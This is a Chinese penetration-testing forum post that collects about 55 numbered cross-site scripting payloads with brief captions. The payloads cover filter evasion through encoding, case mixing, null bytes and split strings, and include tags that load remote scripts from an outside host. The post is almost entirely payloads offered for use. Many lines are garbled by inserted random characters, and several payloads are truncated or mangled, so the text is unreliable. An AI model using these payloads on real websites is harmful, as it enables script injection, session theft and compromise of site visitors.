中国网络渗透测试联盟

标题: XSS攻击汇总 [打印本页]
作者: admin    时间: 2016-4-28 10:06
标题: XSS攻击汇总
(1)普通的XSS JavaScript注入
. F0 g2 l8 K1 g( d5 P) E3 S<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>2 b# M) @! J2 n% u. E: s/ g
(99)另类弹框9 G9 D4 S1 u' n# W. c) f
<q/oncut=alert()>1
+ T; O% F4 D' }! E( C/ R5 U$ P<s/onclick=alert()>b+ T; h* h# j3 T* {4 K& o% N
<XSS=" onclick="alert(1)//">clickme</SSX=">
7 M; ]! v6 \3 l* @  v4 \: Z, h <zzz onclick=alert`1`>clickme</zzz>
" T. G* k  a2 L1 }4 k9 C <a onclick=alert`1`>clickme</a>
, a) _/ y0 @2 n* \; ^6 D$ p) N1 \4 x<a=">clickme</a=">/ d4 i8 n5 G0 b0 g9 a
<a=">clickme</a>3 ]5 i, B5 K# {
<z=">clickme</z=">% P( L; T' s* \% {1 A/ r$ w
<z onclick=alert`1`>clickme</z>) F4 a0 f2 ~' g0 l# I( j3 q
1 I8 K# Y8 \  ]% N: u  g. H- n2 |( Q; P
(2)IMG标签XSS使用JavaScript命令& `8 B6 D: Q  L% ^: z0 P
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>4 H. S! p: P7 {+ m
6 t$ @8 ]& P! Z4 x4 F: W# W& \9 P
(3)IMG标签无分号无引号, \9 l. M" [! H  Q9 P& L
<IMG SRC=javascript:alert(‘XSS’)>$ q- C9 a- b3 n' M: m$ f2 v
, J- u6 R% u" v* u9 @2 f) ~
(4)IMG标签大小写不敏感
: v' v6 a' x7 v. U<IMG SRC=JaVaScRiPt:alert(‘XSS’)>( H% H: a4 t- D& W+ E( n) |- U/ G

2 ]  @& z' ~6 L  ]3 G(5)HTML编码(必须有分号)
1 E5 k4 x& i6 ~& S- P) H<IMG SRC=javascript:alert(“XSS”)>7 s, a% ^; z* E0 F
5 T# Z4 R: n5 i, i2 r  x; h
(6)修正缺陷IMG标签
8 N, G1 {& _: z0 Z<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
' D$ W! U3 S, g6 F. Q
% s0 T7 e9 C4 Z! V(7)formCharCode标签(计算器)4 l; p+ U( ^5 U/ `. c" h1 r( ^
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>9 p  E; H( h6 o% P; v! K; S
6 s7 G. _% m4 Q% X
(8)UTF-8的Unicode编码(计算器)
. m# l4 z/ L9 a7 a<IMG SRC=jav..省略..S')>
- R7 s2 X/ d9 [7 W- {
  z& Z6 U  _# E6 Q(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
$ B  t" ~0 B1 a<IMG SRC=jav..省略..S')>
& o' u4 k! F% k1 t, v+ y) @" t5 z0 t9 L7 M- b  T
(10)十六进制编码也是没有分号(计算器)' D; J# |7 X# A- y( |1 L
<IMG SRC=\'#\'" /span>
' P/ w' u8 n" `  ?% _, V, ?  }
6 |% K0 b" C  m) m2 Z1 Q/ |(11)嵌入式标签,将Javascript分开
1 i2 {) W3 J& e9 w' H<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>& `" r+ ]3 w( a3 N2 Y, C& }8 _: o1 w2 I
* H2 l% R; T- h* x, A
(12)嵌入式编码标签,将Javascript分开, Z* O$ Z$ `5 V5 H9 p* V+ w' D
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
( w4 ]# d1 c0 V2 |, U& {& B  a7 H$ B/ ?5 Q: U3 g$ i
(13)嵌入式换行符2 g  [8 N$ f& n- O' n0 e- w2 ~/ L
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
4 k  m9 [  s& _5 w  c9 t" j9 Q+ p: Y" B; y' ~
(14)嵌入式回车
' H2 b% D& Y  ?$ Z<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>- S' }  y" V* J6 w' l
7 r  @$ |) f6 |0 V1 w  j
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
1 t8 m$ n, L  I5 C2 d<IMG SRC=\'#\'" /span>; i4 ^( D3 @$ _- b7 p

% i+ B% b/ D+ G(16)解决限制字符(要求同页面); Z2 z7 e' M$ u% K7 [7 J$ a
<script>z=’document.’</script>
5 q  D6 T" _* F% B) f4 j6 h4 j<script>z=z+’write(“‘</script>
2 N8 t! x8 w' B0 \<script>z=z+’<script’</script>
6 e. g  `$ k! C, |% C<script>z=z+’ src=ht’</script>
# H& H( |1 a! {. V  ]6 p7 T<script>z=z+’tp://ww’</script>
# X' _$ ~% N+ ?8 v8 M<script>z=z+’w.shell’</script>, M' d4 f& h0 X( Y& S  A
<script>z=z+’.net/1.’</script>
4 N. G# r( A0 e4 R<script>z=z+’js></sc’</script>
1 s! ]. c& U* N2 S7 R9 q<script>z=z+’ript>”)’</script>6 m/ C' A! W* ^8 k2 O1 @5 C% v
<script>eval_r(z)</script>
: J" k2 A1 X- P  H! Z0 I. C8 Y& ~: B  [+ o
(17)空字符
# [7 |1 _& V+ n8 `perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
6 z9 T- D7 k/ g$ M, Y& H
3 g$ e/ A$ m, H8 P+ ?(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
( G0 u( B, o" A$ j7 X/ Xperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out3 h3 {( q- P. [! t& u6 |
2 O- `4 ^) @+ ~2 Y2 ?
(19)Spaces和meta前的IMG标签# @* |2 u  P- ?( ^
<IMG SRC=\'#\'"   javascript:alert(‘XSS’);”>6 U  c) P9 j5 w9 L
+ O' e" s3 B4 G6 `
(20)Non-alpha-non-digit XSS0 X) r/ b& z) c1 P* P2 V4 k
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>  G6 y; ]( ?# d
  T1 \/ l; e/ w$ J6 b
(21)Non-alpha-non-digit XSS to 2/ H5 e# v# M" M4 I6 I
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
2 C& t) C8 {2 _' ~( `& V
$ B+ E" f2 v$ E3 t. s(22)Non-alpha-non-digit XSS to 3
5 Y  r, f9 @$ @8 x& D3 ^1 M: {- J<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>, P8 x" k5 `0 j; v  S
3 ?$ n# u& n! r4 y* B7 x) ~
(23)双开括号
1 h* G+ Z! e, ?+ _7 B<<SCRIPT>alert(“XSS”);//<</SCRIPT>2 U5 Y8 t% s1 f$ \8 F! q' {
' ]0 d2 z$ J  c: K
(24)无结束脚本标记(仅火狐等浏览器)
% Y/ h6 _9 m0 l$ Q6 ~6 O<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>! U, \$ m- d" l; x8 X& j; R
/ Y% s1 E  ~$ M
(25)无结束脚本标记20 B% P. O0 Q5 h8 O6 V
<SCRIPT SRC=//3w.org/XSS/xss.js>
6 M* ]9 y* c+ s
9 J% `  S: m* n: @(26)半开的HTML/JavaScript XSS. r2 m( G+ a' p' F+ ~
<IMG SRC=\'#\'" /span>  m8 \$ I% b/ N7 c
* i! K6 n( Z/ }/ d3 c
(27)双开角括号
  G1 X1 ~. _, d<iframe src=http://3w.org/XSS.html <! O; ]) c  x7 Y0 ^3 W+ s

9 ~4 j: {1 D" l/ J* m* ?  u# s, z(28)无单引号 双引号 分号
4 X4 K# a3 P) C. N- h<SCRIPT>a=/XSS/
% a) S$ ]' d% D9 O% xalert(a.source)</SCRIPT>
+ n; Q7 ~4 R, u4 J! n+ s+ y: t  A! a( P' `
(29)换码过滤的JavaScript& s* m8 }0 d; V9 K
\”;alert(‘XSS’);//
% ], y' b+ J/ S
6 @( B6 K( @/ g' Z) h- o5 {; H9 [(30)结束Title标签& ]8 @! f6 |( o3 r# x
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
0 N3 b: N2 T! q' r8 ~, T6 ?# o- k6 ^, [' l! i/ B, c
(31)Input Image
$ k! q0 K* \& d8 \/ d1 P<INPUT SRC=\'#\'" /span>8 T# E$ m; A$ r4 h

- Y  T  C0 }' i, l# A$ d' N9 Z(32)BODY Image7 v9 z. b  O& R  \9 A1 ?
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>/ \0 y% I% E& U8 k* u
8 |" n: c* J# R. }/ W* S6 f
(33)BODY标签
0 S3 Y4 b& m* h<BODY(‘XSS’)>
. F- C0 H7 T& r
5 S$ c: K6 Y1 t# `& [6 s(34)IMG Dynsrc0 X0 E; V- C8 j3 S5 F* a3 I
<IMG DYNSRC=\'#\'" /span>
) X1 L( }$ H0 p! j2 i2 x6 n3 c, C* s/ c7 }& K0 |
(35)IMG Lowsrc0 U1 z% d, p7 T! O. h, }
<IMG LOWSRC=\'#\'" /span>
# E/ H  B. Q) h3 |" z- ~/ t! H$ ]1 a/ ~: L9 g
(36)BGSOUND
( s+ g2 }( E: S1 ^4 x<BGSOUND SRC=\'#\'" /span>5 X6 \, |- G# L' @% f# @; ~) V

( z# h/ L/ A+ ^- V4 W5 @( b(37)STYLE sheet
+ h2 @# k7 [+ |( ^& y<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>) {) q: |$ d/ E, b; J1 C
* i; F. y7 v0 ^1 Y2 o' Q
(38)远程样式表
  V+ c) G0 e2 X6 a0 H<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>0 K1 n' M$ z7 J8 ]0 T+ u# q; ^% m
; V& D  u( w  n7 X) n+ w; t) c
(39)List-style-image(列表式)1 z/ q/ j8 d( y' G+ g5 T9 Z' D: n
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS( v: s! B  k* z7 z1 Y

" d# Q" Y! X9 @3 c3 v(40)IMG VBscript
; J& c/ }- n5 C<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
7 y' y2 l6 s; |# q; s& E7 O- u1 H5 n
(41)META链接url. ~! k9 P4 S2 Q1 E
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
! P% l* K- W# q* ~
( d5 g5 B1 o0 ~( L' V. [(42)Iframe
* X( q% x$ s8 Z, ]8 S3 n: Q7 r( }<IFRAME SRC=\'#\'" /IFRAME>9 k' X! i& \+ a. _1 w9 ]3 l' U

; a5 ?$ b( h, f9 W; O! C7 \1 B(43)Frame! t% J) F5 ^: [* a% d1 m/ A6 K; d5 R
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
0 k1 f+ J; S7 I& I! l5 D# Z8 y$ N& r7 P0 g
(44)Table
$ B8 ?' L$ `0 }: U4 n2 y! E<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>8 X1 Z8 N  a6 q! O6 I/ {1 T

5 P1 G$ X: q4 d9 N& @(45)TD5 ?. P* E* W7 Q% M% \
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>2 T8 G* z* U. p* d
3 U) N+ i# M0 p5 H
(46)DIV background-image& ]9 T1 o1 |3 c" O% u) c0 n- u
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
  P" o+ f. f# w2 F" i6 g
/ B# V) ?3 W. [(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279). X7 X/ G: N5 J0 G. e1 E5 r
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>, _  o& z! f$ m" V/ c8 `

; Q, E' A4 w: ^- _4 Y(48)DIV expression
* ^9 }/ z' x0 z  r. a<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
/ |- ]; G+ F. ?% C" E1 p8 F( n, t' I* v4 d
(49)STYLE属性分拆表达
) V5 Q* [) Y1 c8 _& K<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
! h& W* R9 L8 S( I  e7 u. j! G# |" B3 F1 r
(50)匿名STYLE(组成:开角号和一个字母开头)1 s! ?) f* N1 [% t) K4 M9 u
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
3 {( H) O+ s$ P0 [' }, M
% D, q. f8 A  |(51)STYLE background-image
" I( s6 C2 @2 @) m: p7 J4 Q# d" y# d5 [<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>. y9 _. ~5 \. A: S
& a. ?7 v" u- j) V* ^
(52)IMG STYLE方式+ j9 \# b- [# P9 b% q% q% O
exppression(alert(“XSS”))’>
1 S9 r$ K- K+ y  ?: v
; ^6 e6 c' F' P(53)STYLE background
( E7 w$ Z) n& S2 _7 y; O<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
5 R) y. J$ O& D' J& I
8 k3 @: X$ e+ Y  [; j(54)BASE
, \! W$ u" J+ R* G; J; k$ W( V1 \<BASE HREF=”javascript:alert(‘XSS’);//”>
- H" f# F7 |% P3 U# B9 v: M" S% f2 D* ~0 R. x& _
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
) A+ E& f5 z2 H( I<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>: A0 i- p# G$ l9 u: |; r4 N' J




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2